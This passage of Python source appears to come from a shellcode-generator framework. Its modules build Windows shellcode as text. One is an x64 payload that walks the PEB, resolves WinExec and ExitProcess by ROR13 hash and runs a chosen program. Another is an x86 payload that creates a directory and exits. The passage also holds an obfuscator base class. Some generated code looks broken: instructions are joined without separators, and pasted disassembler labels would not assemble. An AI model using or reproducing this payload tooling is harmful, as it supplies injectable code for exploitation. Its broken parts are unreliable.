        payload += " mov r12, [r12] ;3nd entry"
        payload += " mov r12, [r12 + 0x20] ;kernel32.dll base address!"
        payload += " "
        payload += ";find address of winexec from kernel32.dll which was found above. "
        payload += " mov rdx, 0xe8afe98 ; hash of winexec given to rdx "
        payload += " mov rcx, r12 ; rcx has dll address now"
        payload += " mov r12, r12"
        payload += " call GetProcessAddress ; give arguments in rdx and rcx and get rax back with winexex"
        payload += " "
        payload += "; the winexec call"
        payload += " jmp GetProgramName"
        payload += ""
        payload += "ExecProgram:"
        payload += " pop rcx ;rcx has the handle to the calc.exe string (1st argument)"
        payload += " mov edx, 1"
        payload += " call rax"
        payload += " "
        payload += ";ExitProcess"
        payload += " mov rdx, 0x2d3fcd70 "
        payload += " mov rcx, r15"
        payload += " call GetProcessAddress"
        payload += " xor rcx, rcx ;uExitCode"
        payload += " call rax "
        payload += ""
        payload += ";get program name"
        payload += "GetProgramName:"
        payload += " call ExecProgram"
        payload += f" db {dest}"  # caller-supplied text (see class note)
        payload += " db 0x00 ; null terminated string"
        payload += ""
        payload += ";Hashing section to resolve a function address "
        payload += "GetProcessAddress: "
        payload += " mov r13, rcx ;base address of dll loaded - rdx has winexec, rcx has kernel32 addr"
        payload += " mov eax, [r13d + 0x3c] ;skip DOS header and go to PE header"
        payload += " mov r14d, [r13d + eax + 0x88] ;0x88 offset from the PE header == the export table. "
        payload += " add r14d, r13d ;make the export table an absolute base address and put it in r14d."
        payload += ""
        payload += " mov r10d, [r14d + 0x18] ;go into the export table and get the numberOfNames "
        payload += " mov ebx, [r14d + 0x20] ;get the AddressOfNames offset. "
        payload += " add ebx, r13d ;AddressofNames base. "
        payload += " "
        payload += "find_function_loop: "
        payload += " jecxz find_function_finished ; jump short if ecx == zero. nothing found "
        payload += " dec r10d ;dec ECX by one for the loop"
        payload += " mov esi, [ebx + r10d * 4] ;get a name to from the export table. "
        payload += " add esi, r13d ;esi == now the current name to search on. "
        payload += " "
        payload += "find_hashes:"
        payload += " xor edi, edi"
        payload += " xor eax, eax"
        payload += " cld"
        payload += ""
        payload += ";this block computes the hash for whatever == at esi "
        payload += "continue_hashing: "
        payload += " lodsb ;load byte at ds:esi to al"
        payload += " test al, al ;is the end of string resarched?"
        payload += " jz compute_hash_finished"
        payload += " ror dword edi, 0xd ;ROR13 for hash calculation!"
        payload += " add edi, eax ; edi has the hash from the hash calculation"
        payload += " jmp continue_hashing"
        payload += ""
        payload += "; this block checks the hash and then gives back the function loaded at eax "
        payload += "compute_hash_finished:"
        payload += " cmp edi, edx ;edx has the function hash (rdx , rcx was passed on from above)"
        payload += " jnz find_function_loop ;didn't match, keep trying!"
        payload += " mov ebx, [r14d + 0x24] ;put the address of the ordinal table and put it in ebx. "
        payload += " add ebx, r13d ;absolute address"
        payload += " xor ecx, ecx ;ensure ecx == 0'd. "
        # Two adjacent literals: implicit string concatenation, one emitted line.
        payload += " mov cx, [ebx + 2 * r10d] ;ordinal = 2 bytes. Get the current ordinal and put it in cx." \
                   " ECX was our counter for which # we were in. "
        payload += " mov ebx, [r14d + 0x1c] ;extract the address table offset"
        payload += " add ebx, r13d ;put absolute address in EBX."
        payload += " mov eax, [ebx + 4 * ecx] ;relative address"
        payload += " add eax, r13d ; eax has the required function given by the hash in rcx"
        payload += ""
        payload += ""
        payload += "find_function_finished:"
        payload += " ret"
        return payload

    def run(self):
        """Convert ``dest_file`` with ``stack.generate`` and print the generated text.

        The result is printed rather than passed to ``handle_generate`` as
        sibling modules do.
        """
        file_dest = stack.generate(self.dest_file, "%ecx", "string")
        print(self.generate(file_dest))
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) built from ``dirname``.

    NOTE(review): instructions are joined without ``\\n`` here, unlike most
    sibling modules. ``stack``, ``base_module`` and ``ceil`` are module-level
    names not visible in this listing (``ceil`` is presumably ``math.ceil``).
    """

    dirname = base_module.OptString("", "Dir name")  # TODO improve descr

    def generate(self):
        """Return the concatenated assembly text.

        The ``add $..., %esp`` after the call unwinds the pushed name using
        ``8 + 4 * ceil(len(dirname) / 4)`` bytes (character count rounded up
        to a multiple of 4, plus 8).
        """
        # Everything up to "add %ebx, %edx" is repeated verbatim in several
        # sibling modules of this file; a shared helper would remove the copy.
        payload = "xor %ecx, %ecx"
        payload += "mov %fs:0x30(%ecx), %eax"
        payload += "mov 0xc(%eax), %eax"
        payload += "mov 0x14(%eax), %esi"
        payload += "lods %ds:(%esi), %eax"
        payload += "xchg %eax, %esi"
        payload += "lods %ds:(%esi), %eax"
        payload += "mov 0x10(%eax), %ebx"
        payload += "mov 0x3c(%ebx), %edx"
        payload += "add %ebx, %edx"
        payload += "mov 0x78(%edx), %edx"
        payload += "add %ebx, %edx"
        payload += "mov 0x20(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "xor %ecx, %ecx"
        payload += "inc %ecx"
        payload += "lods %ds:(%esi), %eax"
        payload += "add %ebx, %eax"
        payload += "cmpl $0x50746547, (%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "cmpl $0x41636f72, 0x4(%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "cmpl $0x65726464, 0x8(%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "mov 0x24(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "mov (%esi, %ecx, 2), %cx"
        payload += "dec %ecx"
        payload += "mov 0x1c(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "mov (%esi, %ecx, 4), %edx"
        payload += "add %ebx, %edx"
        payload += "push %ebx"
        payload += "push %edx"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "push $0x4179726f"
        payload += "push $0x74636572"
        payload += "push $0x69446574"
        payload += "push $0x61657243"
        payload += "push %esp"
        payload += "push %ebx"
        payload += "call *%edx"
        payload += "add $0x10, %esp"
        payload += "pop %ecx"
        payload += "push %eax"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += stack.generate(self.dirname, "%ecx", "string")  # name -> stack
        payload += "xor %ebx, %ebx"
        payload += "mov %esp, %ebx"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "push %ebx"
        payload += "call *%eax"
        # Unwind the pushed name (character count, not byte count, is used).
        payload += f"add ${hex(int(8 + 4 * (ceil(len(self.dirname) / float(4)))))}, %esp"
        payload += "pop %edx"
        payload += "pop %ebx"
        payload += "xor %ecx, %ecx"
        payload += "mov $0x61737365, %ecx"
        payload += "push %ecx"
        payload += "subl $0x61, 0x3(%esp)"
        payload += "push $0x636f7250"
        payload += "push $0x74697845"
        payload += "push %esp"
        payload += "push %ebx"
        payload += "call *%edx"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "call *%eax"
        return payload

    def run(self):
        """Print the generated text; no validation and no ``handle_generate`` call, unlike sibling modules."""
        print(self.generate())
class Obfuscator(base_module.BaseModule):
    """Base for obfuscation modules: declares the shared ``method`` option only.

    No behaviour beyond ``BaseModule`` is added here; the obfuscation module
    earlier in this listing reads ``self.method`` but subclasses ``BaseModule``
    directly rather than this class — NOTE(review): confirm which base is
    intended. ``base_module`` is a module-level name not visible here.
    """

    method = base_module.OptString("", "Obfuscate method")